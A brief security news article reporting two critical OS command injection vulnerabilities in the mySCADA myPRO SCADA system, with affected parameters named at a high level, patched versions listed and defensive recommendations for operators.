Cybersecurity experts have revealed details of two critical vulnerabilities affecting mySCADA myPRO, a Supervisory Control and Data Acquisition (SCADA) system utilized in operational technology (OT) environments. These vulnerabilities could enable malicious actors to gain control of vulnerable systems.
According to Swiss security company PRODAFT, exploiting these vulnerabilities could grant unauthorized access to industrial control networks, resulting in significant operational disruptions and financial losses.
The following are the vulnerabilities, both of which have a CVSS v4 score of 9.3:
- CVE-2025-20014 – An operating system command injection vulnerability that could allow an attacker to execute arbitrary commands on the affected system by sending specially crafted POST requests with a version parameter.
- CVE-2025-20061 – An operating system command injection vulnerability that could allow an attacker to execute arbitrary commands on the affected system by sending specially crafted POST requests with an email parameter.
Successful exploitation of either vulnerability could enable an attacker to inject system commands and execute arbitrary code. The issues have been addressed in the following versions:
- mySCADA PRO Manager 1.3
- mySCADA PRO Runtime 9.2.1
PRODAFT notes that both vulnerabilities stem from a failure to properly sanitize user inputs, making it possible for attackers to inject commands.
According to the company, “These vulnerabilities highlight the ongoing security risks in SCADA systems and the need for more robust defenses. Exploitation could lead to operational disruptions, financial losses, and safety hazards.”
Organizations are advised to apply the latest patches, implement network segmentation by isolating SCADA systems from IT networks, enforce strong authentication, and monitor for suspicious activity.
